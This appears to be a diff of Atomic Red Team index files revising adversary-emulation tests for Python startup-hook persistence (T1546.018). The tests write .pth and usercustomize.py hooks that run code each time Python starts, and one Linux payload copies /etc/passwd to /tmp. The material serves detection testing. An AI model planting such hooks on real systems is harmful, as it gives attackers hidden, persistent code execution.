+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-    - name: Python Startup Hook Execution via .pth (macOS)
-      auto_generated_guid: 858b4aed-d76f-443d-a801-5454ea56dee0
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
       description: 'Creates a Python startup hook using a .pth file inside a virtual
         environment on macOS.
 
@@ -46409,32 +46463,87 @@ privilege-escalation:
           description: App to launch
           type: string
           default: Calculator
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: string
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
         get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
-          (''brew install python'') or the macOS developer tools (''xcode-select --install'')."
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
           echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
           $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
           echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
           pkill "#{exe_name}" || true
           [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern
@@ -71912,91 +72021,145 @@ persistence:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Windows)
-      auto_generated_guid: b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Windows.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
       supported_platforms:
       - windows
       input_arguments:
-        exe_name:
-          description: Executable to launch
-          type: string
-          default: calc.exe
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test.
+          type: String
           default: python.exe
       dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: 'if (Get-Command #{python_path} -ErrorAction SilentlyContinue)
-          { exit 0 } else { exit 1 }
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-        get_prereq_command: 'Write-Host "Python not found. Please install it from
-          https://www.python.org/downloads/windows/ or via ''winget install Python.Python.3''"
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
         name: powershell
         elevation_required: false
         command: |
-          $TempDir = Join-Path $env:TEMP ("atomic_python_hook_" + [guid]::NewGuid())
-          New-Item -ItemType Directory -Path $TempDir | Out-Null
-          Set-Location $TempDir
-          Set-Content -Path "$env:TEMP\atomic_python_hook_path.txt" -Value $TempDir
-          & "#{python_path}" -m venv env
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
           $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
-          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['#{exe_name}']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
-          & "$TempDir\env\Scripts\python.exe" -c "print('Interpreter started')"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
-          Get-Process CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force
-          if (Test-Path "$env:TEMP\atomic_python_hook_path.txt") {
-            $TempDir = Get-Content "$env:TEMP\atomic_python_hook_path.txt"
-            Remove-Item -Recurse -Force $TempDir -ErrorAction SilentlyContinue
-            Remove-Item "$env:TEMP\atomic_python_hook_path.txt" -Force }
-    - name: Python Startup Hook Execution via .pth (Linux)
-      auto_generated_guid: 85f21c19-18ef-4450-98d8-05bb7b0e1887
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Linux.
-
-        '
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
       supported_platforms:
-      - linux
+      - windows
       input_arguments:
-        python_path:
-          description: Path to Python interpreter
-          type: path
-          default: python3
-      dependency_executor_name: bash
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
-        get_prereq_command: 'echo "Python3 not found. Please install it using your
-          package manager (e.g., ''sudo apt install python3'' or ''sudo yum install
-          python3'')."
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
-        name: bash
+        name: powershell
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
-          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
-          $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
-          echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
-        cleanup_command: 'rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f
-          /tmp/atomic_python_hook_path.txt
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-    - name: Python Startup Hook Execution via .pth (macOS)
-      auto_generated_guid: 858b4aed-d76f-443d-a801-5454ea56dee0
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
       description: 'Creates a Python startup hook using a .pth file inside a virtual
         environment on macOS.
 
@@ -72008,32 +72171,87 @@ persistence:
           description: App to launch
           type: string
           default: Calculator
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: string
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
         get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
-          (''brew install python'') or the macOS developer tools (''xcode-select --install'')."
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
           echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
           $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
           echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
           pkill "#{exe_name}" || true
           [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern

atomics/Indexes/linux-index.yaml

@@ -24969,43 +24969,100 @@ privilege-escalation:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Linux)
-      auto_generated_guid: 85f21c19-18ef-4450-98d8-05bb7b0e1887
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Linux.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
       supported_platforms:
       - linux
       input_arguments:
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: String
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
-        get_prereq_command: 'echo "Python3 not found. Please install it using your
-          package manager (e.g., ''sudo apt install python3'' or ''sudo yum install
-          python3'')."
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
-          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
-          $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
-          echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
-        cleanup_command: 'rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f
-          /tmp/atomic_python_hook_path.txt
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
